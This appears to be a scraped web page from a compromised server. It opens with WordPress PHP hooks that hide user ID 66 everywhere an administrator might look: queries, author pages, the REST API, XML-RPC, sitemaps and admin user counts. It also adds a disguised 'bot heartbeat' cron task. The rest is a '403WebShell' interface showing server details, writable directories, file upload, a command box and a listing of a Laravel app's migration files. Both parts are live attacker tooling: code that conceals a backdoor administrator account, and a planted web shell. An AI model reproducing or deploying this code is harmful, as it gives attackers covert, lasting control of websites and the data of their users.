add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/emaji/database/migrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 12 2026 07:05:37
deploy / www-data
0755
2014_10_12_100000_create_password_resets_table.php
0.653 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_10_145946_create_wallets_table.php
0.791 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_13_145932_create_wallets_table.php
0.519 KB
July 13 2025 14:59:32
deploy / www-data
0644
2025_07_13_175648_create_sessions_table.php
0.769 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_13_180227_create_cache_table.php
0.829 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_16_074304_create_professions_table.php
0.669 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_16_074304_create_qualifications_table.php
0.645 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_16_074306_create_employers_table.php
0.698 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_16_074306_create_jobs_table.php
0.878 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_16_074307_create_profession_qualification_table.php
0.643 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_16_074308_create_job_qualification_table.php
0.611 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_17_071616_create_wallet_qualification_table.php
0.619 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_20_061347_create_qualification_providers_table.php
0.667 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_20_061427_create_provider_qualification_table.php
0.908 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_20_132830_change_qualification_uuid_to_integer_in_provider_qualification_table.php
0.872 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_07_20_160817_create_countries_table.php
0.623 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_08_050126_create_profession_qualification_requirements_table.php
1.375 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_10_111314_create_credential_mappings_table.php
1.452 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_10_111711_create_issuers_table.php
1.57 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_10_112547_create_wallet_credentials_table.php
0.982 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_10_114146_add_uuid_to_wallets_table.php
0.511 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_10_132934_create_wallet_credentials_table.php
0.579 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_10_173936_add_issuer_identifier_to_issuers_table.php
0.521 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_10_173937_add_achievment_it_to_table_wallet_credendials.php
0.573 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_10_173939_change_achievement_id_wallet_credendials.php
0.578 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_11_074006_add_decoded_json_to_wallet_credentials_table.php
0.572 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_11_092353_2026_08_11_112300_add_is_core_to_job_qualification_table.php
0.577 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_11_1111_add_image_fields_to_wallet_credentials_table.php
0.648 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_11_214557_create_users_table.php
0.635 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_11_220036_add_uuid_to_wallet_credentials_table.php
1.291 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_18_173609_create_organizations_table.php
0.71 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_18_173632_create_organization_kinds_table.php
0.816 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_18_173651_create_organization_user_table.php
0.839 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_18_173718_add_org_and_uuid_to_jobs_table.php
1.298 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_21_124103_add_external_refs_to_qualifications_table.php
1.552 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_22_045346_create_languages_table.php
0.559 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_22_183216_add_external_url_to_jobs_table.php
0.624 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_050359_add_created_by_to_jobs_table.php
0.671 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_060410_create_job_qualifications_table.php
0.999 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_082037_split_location_into_city_and_country_in_jobs_table.php
0.805 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_082206_add_city_country_and_user_to_jobs_table.php
0.729 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_082549_remove_employer_id_from_jobs_table.php
0.766 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_083308_alter_jobs_title_nullable.php
0.473 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_085823_add_status_to_jobs_table.php
0.523 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_135125_add_user_id_to_wallets_table.php
0.835 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_23_182514_add_description_to_organizations_table.php
0.57 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_26_040532_create_user_identifiers_table.php
0.791 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_27_184914_create_pathways_table.php
1.059 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_27_185022_create_pathway_requirements_table.php
1.377 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_08_27_185135_create_wallet_languages_table.php
0.764 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_02_050101_add_recognition_fields_to_professions_table.php
0.968 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_02_050114_add_recognition_fields_to_qualifications_table.php
0.87 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_02_050119_create_recognition_rules_table.php
0.93 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_02_050142_create_profession_language_requirements_table.php
0.793 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_02_051817_create_country_language_table.php
0.727 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_02_052132_add_local_language_required_to_professions_table.php
0.603 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_03_184106_add_privacy_accepted_at_to_users_table.php
0.538 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_03_185343_ping_method_to_users_table.php
0.547 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_04_143720_create_user_credentials_table.php
1.32 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_04_143725_create_user_qualifications_table.php
0.666 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_04_143731_create_user_languages_table.php
0.668 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_04_143736_update_pathways_table_replace_wallet_with_user.php
0.937 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_04_143741_drop_wallet_tables.php
0.378 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_09_04_183018_add_type_to_qualifications_table.php
0.604 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_11_24_160916_create_organization_users_table.php
0.759 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_11_24_161040_update_organization_user_to_use_organization_users.php
1.532 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_11_24_161106_update_jobs_table_to_use_organization_users.php
3.188 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_11_24_171036_add_organization_id_and_super_admin_to_organization_users.php
1.472 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_11_24_181744_create_user_invitations_table.php
1.049 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_11_25_051312_add_achievement_id_to_trainings_table.php
0.628 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_11_25_052014_rename_achievement_id_to_credential_identifier_in_trainings_table.php
0.646 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_11_25_133119_add_maturity_level_to_organizations_table.php
0.64 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_12_03_184753_create_organization_credentials_table.php
1.817 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_12_04_061405_add_logo_to_organizations_table.php
0.607 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_12_11_212717_create_contact_requests_table.php
0.81 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_12_13_194703_add_onboarding_completed_at_to_users_table.php
0.667 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_12_14_175732_add_wizard_fields_to_trainings_table.php
0.977 KB
May 12 2026 07:05:37
deploy / www-data
0644
2025_12_14_183809_add_is_digital_to_training_instances_table.php
0.634 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_01_165654_drop_profession_qualification_requirements_table.php
0.986 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_02_192317_add_credentialability_fields_to_qualifications_and_job_qualifications.php
1.903 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_08_174609_add_achievement_id_to_credential_mappings_table.php
0.834 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_08_181411_add_level_to_credential_mappings_table.php
0.762 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_12_191525_create_badge_albums_table.php
1.372 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_12_191551_create_badge_album_sections_table.php
1.278 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_12_191552_create_badge_album_slots_table.php
1.433 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_12_193804_add_image_url_to_badge_album_slots_table.php
0.65 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_15_122204_add_badgau_api_fields_to_organizations_table.php
0.729 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_01_18_060102_add_issuer_fields_to_badge_album_slots_table.php
1.284 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_03_07_205437_add_badgau_issuer_did_to_organizations_table.php
0.559 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_03_18_065045_add_reviewed_at_to_organizations_table.php
0.906 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_04_03_184327_add_branding_to_badge_albums_table.php
0.73 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_04_03_194335_add_brand_color_to_organizations_table.php
0.621 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_04_04_055444_add_osp_fields_to_badge_albums_table.php
0.74 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_04_04_060247_change_osp_pathway_id_to_uuid_in_badge_albums.php
0.913 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_04_04_103813_make_created_by_nullable_on_badge_albums.php
0.655 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_04_04_131505_add_organization_id_to_badge_albums.php
0.795 KB
May 12 2026 07:05:37
deploy / www-data
0644
2026_04_12_120000_fix_achievement_ids_to_url_format.php
4.06 KB
May 12 2026 07:05:37
deploy / www-data
0644

Youez - 2016 - github.com/yon3zu
LinuXploit